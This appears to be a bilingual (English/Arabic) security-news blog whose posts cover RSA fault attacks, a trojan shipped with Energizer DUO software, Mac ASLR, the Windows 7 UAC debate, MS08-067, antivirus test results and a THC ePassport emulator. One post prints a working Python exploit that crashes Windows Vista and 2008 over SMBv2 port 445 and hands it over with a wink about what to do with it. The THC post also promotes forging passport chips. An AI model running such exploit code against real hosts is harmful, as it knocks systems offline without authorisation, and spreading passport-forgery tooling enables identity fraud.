What I Know

Since 1977, RSA public-key encryption has protected privacy and verified authenticity when using computers, gadgets and web browsers around the globe, with only the most brutish of brute force efforts (and 1,500 years of processing time) felling its 768-bit variety earlier this year. Now, three eggheads (or Wolverines, as it were) at the University of Michigan claim they can break it simply by tweaking a device’s power supply. By fluctuating the voltage to the CPU such that it generated a single hardware error per clock cycle, they found that they could cause the server to flip single bits of the private key at a time, allowing them to slowly piece together the password. With a small cluster of 81 Pentium 4 chips and 104 hours of processing time, they were able to successfully hack 1024-bit encryption in OpenSSL on a SPARC-based system, without damaging the computer, leaving a single trace or ending human life as we know it. That’s why they’re presenting a paper at the Design, Automation and Test conference this week in Europe, and that’s why — until RSA hopefully fixes the flaw — you should keep a close eye on your server room’s power supply.

via: Engadget.com

I received this interesting news today from my friend Lance. he said that he have read of several instances where hardware was infected but this is the first time he seen it officially reported in a CERT alert. The Energizer DUO, a USB-powered battery recharger was distributing malicious code that infected windows systems.

The hardware device itself does not infect the computer.  Instead the infection happens from the software that comes with the device.  Energizer is currently working with CERT to learn how their software was infected.  In addition, only 9 out of 42 anti-virus products were able to detect the virus.

Lesson learned, it does not matter where you get the software from, scan it before installing it.  Be sure your policies are enforcing this.

Technical details about this trojan can be found here

via: HoneyTech Security Update

Snow Leopard lacks security features that are built in to Windows XP, Windows Vista and Windows 7, a noted Mac researcher has said. Dubbed ASLR, for address space layout randomization, the technology randomly assigns data to memory to make it tougher for attackers to determine the location of critical operating system functions, and thus make it harder for them to craft reliable exploits.

“Apple didn’t change anything,” said Charlie Miller, of Baltimore-based Independent Security Evaluators, the co-author of The Mac Hacker’s Handbook, and winner of two consecutive “Pwn2own” hacker contests. “It’s the exact same ASLR as in Leopard, which means it’s not very good.”

Interesting news isn’t it you can continue reading @ the source here

There is a flaw in SMB2.0 which exists (I mean the SMBv2 itself not the vulnerability) in windows vista, 2008,7 and 2008 R2 but only Windows Vista & 2008 are vulnerable. If you exploited this flaw successfully you will crash & reboot any vista or 2008 remotely (of course only if SMB 445 port open ). Anyhow here is the exploit code it’s written in python & I will assume that you know what to do with it

# SecurityReason Note :
# Tested on : Windows Vista SP2 full updated – US-en
#
#!/usr/bin/python
# When SMB2.0 recieve a “&” char in the “Process Id High” header field it
dies with a
# PAGE_FAULT_IN_NONPAGED_AREA B.S.O.D

from socket import socket
from time import sleep

host = “IP_ADDR”, 445
buff = (
“\x00\x00\x00\x90″ # Begin SMB header: Session message
“\xff\x53\x4d\x42″ # Server Component: SMB
“\x72\x00\x00\x00″ # Negociate Protocol
“\x00\x18\x53\xc8″ # Operation 0×18 & sub 0xc853
“\x00\x26″# Process ID High: –> normal operation should be “\x00\x00″
“\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe”
“\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54″
“\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31″
“\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00″
“\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57″
“\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61″
“\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c”
“\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c”
“\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e”
“\x30\x30\x32\x00″
)
s = socket()
s.connect(host)
s.send(buff)
s.close()

Some guy has developed software that allows only an authorized person to see what is on the screen, everyone else just sees gibberish. Sounds interesting, I’d like to see it in action though.

Chameleon uses gaze-tracking software and camera equipment to track an authorized reader’s eyes to show only that one person the correct text. After a 15-second calibration period where the software essentially “learns” the viewer’s gaze patterns, anyone looking over that user’s shoulder just sees dummy text that randomly and constantly changes.

source:hardocp

 نزل خبر اليومين اللي راحت  بالاانترنت بعنوان  UAC Security Flaw in Windows 7 Beta  الخ الخ .. طبعا انا حالي حال اي شخص متابع ومهتم بالتقنيه شدني الخبر فا بديت اقرى  و حملت السكربت  بجهازي لتجربه الثغره كما  يقال عشان اشوف هل فعلا بيعطل ال UAC والمستخدم نايم في العسل مايدري ولا كيف ؟؟ المهم بعد ماحملت السكربت وشغلت فعلا قام بتعطيل الـ UAC بدون اذني بس  الـ Action Center بويندوز 7  وبنفس للحظه طلع لي تحذير بانه تم تعطيل الـ UAC وانه لازم اعيد التشغيل  الجهاز لاكمال عملية تعطيل الـ UAC طبعا تجاهلت الرساله وبديت اتحرك بالنظام بحريه وبدون ماتطلع لي اي رساله UAC !!

طبعا في  لحظه فكرت انه فعلا عيب ولازم مايكروسوفت تصلحه بس بعد التدقيق اكتشفت انها لا عيب ولا ثغره ولا يحزنون اصلا الناس كانت تشتكي من UAC بفيستا وكانت تطالب مايكروسوفت بانها تعطي المستخدم حريه اختيار مستوى الحماية اللي هو يبغاه .. وفعلا هذا اللي صار بويندوز 7 الـ UAC موجوده بس المستخدم له حريه  الخيار  والتحكم بمستوى حمايه الـ UAC للنظام  والاعدادات الافتراضيه للـ UAC وسط بويندوز 7 يعني ماينط لك  بشكل متكرر مثل الفيستا .  فا سبحان الله ارضاء الناس فعلا غايه لا تدرك .. ايام ماكان UAC بشكل افتراضي على  اقصى مستوى حماية كانت الناس تبحث وتسال كيف يتم تعطيله لانه مزعج ؟  والان لما ترك لهم الخيار واصبح بشكل افتراضي غير مزعج  قالوا لاء هاذي ثغره وبتخلي النظام مفتوح بدون حمايه ؟؟  مع العلم انا اشوف ان الخبر معطى اكبر من حجمه لانه اولا عشان يتم تشغيل السكربت او البرنامج اللي بيعطل ال UAC لازم يكون المستخدم مسوي شي بنفسه يعني ضاغط على برنامج مايعرفه منزل سكربت بجهازه ومشغله وهكذاا .. بالاظافه الى انه في حالة تعطيل خاصيه UAC راح تظهر لك رساله  كبيره تقريبا حجمها نص التاسك بار يعني مافيه امل تقول ماشفتها مفادها ان الـ UAC تم تعطيلها ولابد لك من اعاده التشغيل .. فابالتالي المفروض المستخدم اول مايشوف هالرساله يعرف ان الموضوع فيه شي مو مضبوط .. واخيرا وليس اخراا .. بامكانك رفع مستوى UAC الى اقصى شي وبالتالي راح يكون عندك مستوى حمايه عالي ولا برنامج ولا سكربت بامكانه تعطيل او تعديل على اي  اعداد بنظامك بدون  ماتسمح له وتضغط على متابعه. ( وهذا انا اللي مسويه بجهازي لاني ماستخدم انتي فايروس).

على غير عاده مايكروسوفت (مايكروسوفت تصدر التحديثات كل ثلاثاء) راح تقوم باصدار تحديث اليوم لثغره خطيره جداا تم اكتشافها في نظام تشغيلها ويندوز ومن الممكن ان يتم استغلال هذه الثغره عن بعد ويعطي الهاكر كامل الصلاحيات على جهازك. وبناء على تصريح مايكروسوفت الثغره هذه موجوده بانظمه ويندوز من ويندوز 2000 الى ويندوز 2008 .. وتنصح مايكروسوفت بسرعه تثبيت التحديث بعد اصداره مباشره لحماية نظامك من الهاكرز

 فا للاهميه جرى التنبيه

اضغط هنا لقراءه اعلان مايكروسوفت

تحديث الساعه 12:03 مساء

التحديث نزل من مايكروسوفت المفروض يجيكم عن طريق التحديث التلقائي للنظام  واللي ماطلعت عنده يدخل على هاللنك ويحمل التحديث ويركبه  MS08-067 المشكله في Server سرفس وتحديدا في مشكله في RPC Handling طبعا مستوى خطوره الثغره بانظمه اكس بي و 2000 و 2003 اعلى من فيستا و 2008.

بعد اختبار اجرته شركه Secunia والمختصه في متابعه الثغرات على الانترنت تبين ان برامج الحمايه المتكامله لا تحمي المستخدم بالشكل المطلوب. الاختبار اجري على 12 برنامج حمايه ضد 300 نوع من الهجمات المنتشره على الانترنت  وكانت نتيجه الاختبار مخيبه بحيث كانت شركه سيمانتك ببرنامجها Norton Internet Security 2009 الافضل باكتشافها وتصديها لـ 64 نوع من الهجمات من اصل 300 اي بنسبه اكتشاف 21% .. بينما شركات الحمايه الاخرى لم تتعدى نسبه 3% وهذه قائمه البرامج اللتي اجري عليها الاختبار:

McAfee Internet Security Suite 2009

Norton Internet Security 2009

Windows Live OneCare

ZoneAlarm Security Suite 8

AVG Internet Security 8.0

CA Internet Security Suite 2008

F-secure Internet Security 2009

TrendMicro Internet Security 2008

BitDefender Internet Security Suite 2009

Panda Internet Security 2009

Kaspersky Internet Security 2009

Norman Security Suite 7.10

واظهرت نتيجه الاختبار بان سبب فشل برامج الحمايه المتكامله من حمايه المستخددم هو انها تركز على الـ Payloads الخاصه بالهاكرز بدل من تركيزها على الثغرات نفسها يعني بامكان اي شخص يغير Payloads ويخترق نظام بدون مايكتشفه الانتي فايروس  بينما لو كان التركيز على الثغره نفسها كان افضل لانها ماتتغير.

وهذا لنك تقرير الاختبار اللي اجرته شركه
Secunia
للي حاب يقراه بالكامل.

THC/vonJeek proudly presents an ePassport emulator. This emulator applet  allows you to create a backup of your own passport chip(s).

The government plans to use ePassports at Immigration and Border Control. The information is electronically read from the Passport and displayed to a Border Control Officer or used by an automated setup. THC has discovered weaknesses in the system to (by)pass the security checks. The detection of fake passport chips does not work. Test setups do not raise alerts when a modified chip is used. This enables an attacker to create a Passport with an altered Picture, Name, DoB, Nationality and other credentials.

The manipulated information is displayed without any alarms going off. The exploitation of this loophole is trivial and can be verified using thc-epassport.

Regardless how good the intention of the government might have been, the facts are that tested implementations of the ePassports Inspection System are not secure.

ePassports give us a false sense of security: We are made to believe that they make usemore secure. I’m afraid that’s not true: current ePassport implementations don’t add security at all.

يحتوي اخر تقرير من VB100 لاختبار اجرته على 24 برنامج انتي فايروس مخصص لسيرفرات ويندوز الكثير من المفاجاءت منها نجاح برنامج مايكروسوفت Forefront لمكافحه الفيروسات ورسوب اسماء شهيره في عالم مكافحه الفيروسات مثل Kaspersky و Sophos و F-Secure و Avira . ولكي يجتاز اي برنامج اختبار VB100 ويحصل على وسام vb100 يجب ان يحقق التالي

اولا: هناك 100 عينه من الـ Malwares يجب ان يتم اكتشافها جميعا بدون استثناء سواء كانت عمليه البحث on-demand او on-access
ثانيا: يجب ان تكون نتائج بحث برنامج الانتي فايروس خاليه من الـ false positives ( بالعربي مايقولك الملف هذا فايروس وهو مو فايروس)

والان اترككم مع نتيجه الاختبارات اللتي اجريت على نظام تشغيل مايكروسوفت ويندوز 2008

Windows 2008 VB100

وزياده الخير خيرين نتيجه الاختبارات اللتي اجريت على نظام تشغيل مايكروسوفت ويندوز فيستا سرفس باك 1

Windows Vista SP1 VB100